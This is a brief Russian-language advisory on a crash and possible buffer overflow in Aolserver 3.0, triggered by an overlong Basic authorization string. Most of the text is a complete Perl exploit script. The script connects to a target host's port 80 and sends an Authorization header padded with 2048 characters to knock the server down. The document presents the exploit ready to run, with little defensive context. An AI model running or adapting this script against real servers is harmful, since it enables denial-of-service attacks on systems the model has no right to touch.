Уязвимость в Aolserver 3.0

Aolserver 3.0 разрушается, если ему переслать длинную строку авторизации. Также возможно эта уязвимость позволяет хакеру выполнять произвольный код через переполнение буфера.



Эксплоит:



#!/usr/bin/perl

use IO::Socket;

unless (@ARGV == 1) { die "usage: $0 host ..." }

$host = shift(@ARGV);

$remote = IO::Socket::INET->new( Proto => "tcp",

PeerAddr => $host,

PeerPort => "http(80)",

);

unless ($remote) { die "cannot connect to http daemon on $host" }



$junk = "X" x 2048;

$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n"; $remote->autoflush(1); print $remote $killme; close $remote;